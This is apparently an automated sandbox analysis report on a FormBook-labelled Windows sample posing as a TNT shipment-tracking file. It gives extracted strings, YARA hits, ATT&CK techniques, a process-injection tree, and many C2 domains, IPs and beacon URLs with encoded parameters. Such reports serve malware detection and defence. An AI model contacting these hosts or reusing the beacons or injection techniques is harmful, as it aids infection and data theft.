Source: TNT AWB TRACKING DETAILS.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: TNT AWB TRACKING DETAILS.exe | Binary or memory string: WIN_XPe
Source: TNT AWB TRACKING DETAILS.exe | Binary or memory string: WIN_VISTA
Source: TNT AWB TRACKING DETAILS.exe | Binary or memory string: WIN_7
Source: TNT AWB TRACKING DETAILS.exe | Binary or memory string: WIN_8

          Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_006FF160 RtlStringFromGUID,RtlNtStatusToDosError,memcpy,RtlFreeUnicodeString,CreateFileW,GetLastError,BindIoCompletionCallback,GetLastError,CloseHandle,4_2_006FF160
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 Credential API Hooking | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Shared Modules | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 25 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 512 Process Injection | 1 Rootkit | LSA Secrets | 241 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 512 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1517909 | Sample: TNT AWB TRACKING DETAILS.exe | Startdate: 25/09/2024 | Architecture: WINDOWS | Score: 100
Domains/IPs at start: www.borghardt.xyz, www.xmld101.icu, 11 other IPs or domains
Signatures at start: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures; Performs DNS queries to domains with low reputation (www.borghardt.xyz)
TNT AWB TRACKING DETAILS.exe (started): Writes to foreign memory regions; Maps a DLL or memory area into another process
  svchost.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 3 other signatures
    explorer.exe (injected): www.pools-80761.bond 185.53.179.92, 49713, 80 TEAMINTERNET-ASDE Germany; www.walk-in-tubs-30303.bond 185.53.179.93, 49712, 80 TEAMINTERNET-ASDE Germany; 3 other IPs or domains
      wlanext.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
        cmd.exe (started)
          conhost.exe (started)

Source | Detection | Scanner | Label | Link
TNT AWB TRACKING DETAILS.exe | 53% | ReversingLabs | Win32.Backdoor.FormBook
TNT AWB TRACKING DETAILS.exe | 100% | Avira | HEUR/AGEN.1321671
TNT AWB TRACKING DETAILS.exe | 100% | Joe Sandbox ML
          No Antivirus matches
Source | Detection | Scanner | Label | Link
https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
https://excel.office.com | 0% | URL Reputation | safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
http://www.thetrue.oneReferer: | 0% | Avira URL Cloud | safe
http://www.cyber-eu.digital | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | Avira URL Cloud | safe
http://www.legendhud.shopReferer: | 0% | Avira URL Cloud | safe
http://www.tyumk.xyz/jd21/www.alqahtani.site | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in- | 0% | Avira URL Cloud | safe
https://www.stacker.com/arizona/phoenix | 0% | Avira URL Cloud | safe
http://www.cyber-eu.digital/jd21/ | 0% | Avira URL Cloud | safe
https://wns.windows.com/bat | 0% | Avira URL Cloud | safe
https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de | 0% | Avira URL Cloud | safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp( | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri | 0% | Avira URL Cloud | safe
http://www.r86gd377hi.rent/jd21/www.thetrue.one | 0% | Avira URL Cloud | safe
www.weight-loss-003.today/jd21/ | 0% | Avira URL Cloud | safe
http://www.pools-80761.bond | 0% | Avira URL Cloud | safe
http://www.weight-loss-003.today | 0% | Avira URL Cloud | safe
https://android.notify.windows.com/iOSp | 0% | Avira URL Cloud | safe
http://www.tvtwenty20sr.topReferer: | 0% | Avira URL Cloud | safe
http://www.xmld101.icu | 0% | Avira URL Cloud | safe
http://www.tyumk.xyz/jd21/ | 0% | Avira URL Cloud | safe
http://www.legendhud.shop | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o | 0% | Avira URL Cloud | safe
https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc | 0% | Avira URL Cloud | safe
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal | 0% | Avira URL Cloud | safe
https://api.msn.com/rT | 0% | Avira URL Cloud | safe
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi | 0% | Avira URL Cloud | safe
http://www.propertiesforrentus11.bondReferer: | 0% | Avira URL Cloud | safe
http://www.propertiesforrentus11.bond/jd21/ | 100% | Avira URL Cloud | phishing
https://word.office.com | 0% | Avira URL Cloud | safe
http://www.slab-leak-repair-74697.bond | 0% | Avira URL Cloud | safe
http://www.pools-80761.bond/jd21/www.legendhud.shop | 0% | Avira URL Cloud | safe
http://www.tvtwenty20sr.top/jd21/ | 0% | Avira URL Cloud | safe
http://www.r86gd377hi.rent/jd21/ | 0% | Avira URL Cloud | safe
https://android.notify.windows.com/iOSJM | 0% | Avira URL Cloud | safe
http://www.legendhud.shop/jd21/?FjUh5xw=G0sie2NHVCWw+0/kSEW2r2lr5bZg+lb5pplTBgNoV81oGr9NI8ZMsYInSB9p2CdIvtzo&Bl=8pSpW470ix | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark | 0% | Avira URL Cloud | safe
http://www.thetrue.one/jd21/www.tvtwenty20sr.top | 0% | Avira URL Cloud | safe
https://outlook.com | 0% | Avira URL Cloud | safe
http://www.legendhud.shop/jd21/www.borghardt.xyz | 0% | Avira URL Cloud | safe
http://www.pools-80761.bond/jd21/ | 0% | Avira URL Cloud | safe
http://www.walk-in-tubs-30303.bond/jd21/ | 0% | Avira URL Cloud | safe
http://www.apple0ficial-ld.infoReferer: | 0% | Avira URL Cloud | safe
https://android.notify.windows.com/iOSZM | 0% | Avira URL Cloud | safe
http://www.alqahtani.siteReferer: | 0% | Avira URL Cloud | safe
http://www.borghardt.xyz | 0% | Avira URL Cloud | safe
http://www.alqahtani.site/jd21/ | 0% | Avira URL Cloud | safe
http://www.slab-leak-repair-74697.bond/jd21/ | 0% | Avira URL Cloud | safe
https://www.yelp.com | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the | 0% | Avira URL Cloud | safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg | 0% | Avira URL Cloud | safe
http://www.cyber-eu.digitalReferer: | 0% | Avira URL Cloud | safe
http://www.weight-loss-003.today/jd21/ | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its- | 0% | Avira URL Cloud | safe
http://www.walk-in-tubs-30303.bond/jd21/?Bl=8pSpW470ix&FjUh5xw=DIIN6Z9zLP/ZrbxmBcZ1Ou48L9Vhs8Bu5i/IWLuuzYtgkis57dND5dtWqk2syhOy20nI | 0% | Avira URL Cloud | safe
http://www.tvtwenty20sr.top | 0% | Avira URL Cloud | safe
http://www.r86gd377hi.rentReferer: | 0% | Avira URL Cloud | safe
http://www.tyumk.xyz | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark | 0% | Avira URL Cloud | safe
http://www.circusenergy.online | 100% | Avira URL Cloud | malware
https://api.msn.com/v1/news/Feed/Windows?z$ | 0% | Avira URL Cloud | safe
http://www.alqahtani.site/jd21/www.propertiesforrentus11.bond | 0% | Avira URL Cloud | safe
http://www.r86gd377hi.rent | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist | 0% | Avira URL Cloud | safe
http://www.walk-in-tubs-30303.bond | 0% | Avira URL Cloud | safe
http://www.slab-leak-repair-74697.bondReferer: | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/ | 0% | Avira URL Cloud | safe
http://www.thetrue.one | 0% | Avira URL Cloud | safe
http://www.xmld101.icu/jd21/www.walk-in-tubs-30303.bond | 0% | Avira URL Cloud | safe
http://www.circusenergy.online/jd21/www.cyber-eu.digital | 100% | Avira URL Cloud | malware
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg | 0% | Avira URL Cloud | safe
https://parade.com/61481/toriavey/where-did-hamburgers-originate | 0% | Avira URL Cloud | safe
http://www.xmld101.icu/jd21/ | 0% | Avira URL Cloud | safe
http://www.cyber-eu.digital/jd21/www.weight-loss-003.today | 0% | Avira URL Cloud | safe
http://www.tyumk.xyzReferer: | 0% | Avira URL Cloud | safe
http://www.borghardt.xyz/jd21/ | 0% | Avira URL Cloud | safe
https://www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yR | 0% | Avira URL Cloud | safe
http://www.walk-in-tubs-30303.bond/jd21/www.r86gd377hi.rent | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch- | 0% | Avira URL Cloud | safe
http://www.weight-loss-003.todayReferer: | 0% | Avira URL Cloud | safe
https://api.msn.com/~T | 0% | Avira URL Cloud | safe
http://www.tvtwenty20sr.top/jd21/www.pools-80761.bond | 0% | Avira URL Cloud | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb | 0% | Avira URL Cloud | safe
http://www.weight-loss-003.today/jd21/www.xmld101.icu | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o | 0% | Avira URL Cloud | safe
http://www.xmld101.icuReferer: | 0% | Avira URL Cloud | safe
http://www.borghardt.xyz/jd21/www.slab-leak-repair-74697.bond | 0% | Avira URL Cloud | safe
http://www.slab-leak-repair-74697.bond/jd21/www.tyumk.xyz | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al | 0% | Avira URL Cloud | safe
http://www.circusenergy.online/jd21/ | 100% | Avira URL Cloud | malware
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09 | 0% | Avira URL Cloud | safe
http://www.borghardt.xyzReferer: | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.pools-80761.bond | 185.53.179.92 | true | true | | unknown
www.circusenergy.online | 185.134.245.113 | true | true | | unknown
www.weight-loss-003.today | 188.114.96.3 | true | true | | unknown
www.walk-in-tubs-30303.bond | 185.53.179.93 | true | true | | unknown
legendhud.shop | 77.37.37.36 | true | true | | unknown
www.xmld101.icu | unknown | unknown | true | | unknown
www.slab-leak-repair-74697.bond | unknown | unknown | true | | unknown
www.borghardt.xyz | unknown | unknown | true | | unknown
www.legendhud.shop | unknown | unknown | true | | unknown
www.cyber-eu.digital | unknown | unknown | true | | unknown
www.tvtwenty20sr.top | unknown | unknown | true | | unknown
www.r86gd377hi.rent | unknown | unknown | true | | unknown
www.thetrue.one | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
www.weight-loss-003.today/jd21/ | true | Avira URL Cloud: safe | unknown
http://www.legendhud.shop/jd21/?FjUh5xw=G0sie2NHVCWw+0/kSEW2r2lr5bZg+lb5pplTBgNoV81oGr9NI8ZMsYInSB9p2CdIvtzo&Bl=8pSpW470ix | true | Avira URL Cloud: safe | unknown
http://www.walk-in-tubs-30303.bond/jd21/?Bl=8pSpW470ix&FjUh5xw=DIIN6Z9zLP/ZrbxmBcZ1Ou48L9Vhs8Bu5i/IWLuuzYtgkis57dND5dtWqk2syhOy20nI | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.thetrue.oneReferer: | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cyber-eu.digital | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wns.windows.com/bat | explorer.exe, 00000003.00000003.2292994901.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3084837217.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3853190566.000000000899E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.stacker.com/arizona/phoenix | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000003.00000003.3082423686.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1455360793.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3844572593.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.legendhud.shopReferer: | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cyber-eu.digital/jd21/ | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tyumk.xyz/jd21/www.alqahtani.site | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in- | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp( | explorer.exe, 00000003.00000000.1469409871.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292310130.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3858182302.000000000BD22000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.pools-80761.bond | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.weight-loss-003.today | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.r86gd377hi.rent/jd21/www.thetrue.one | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.tvtwenty20sr.topReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.tyumk.xyz/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.xmld101.icuexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://android.notify.windows.com/iOSpexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.legendhud.shopexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&ocexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
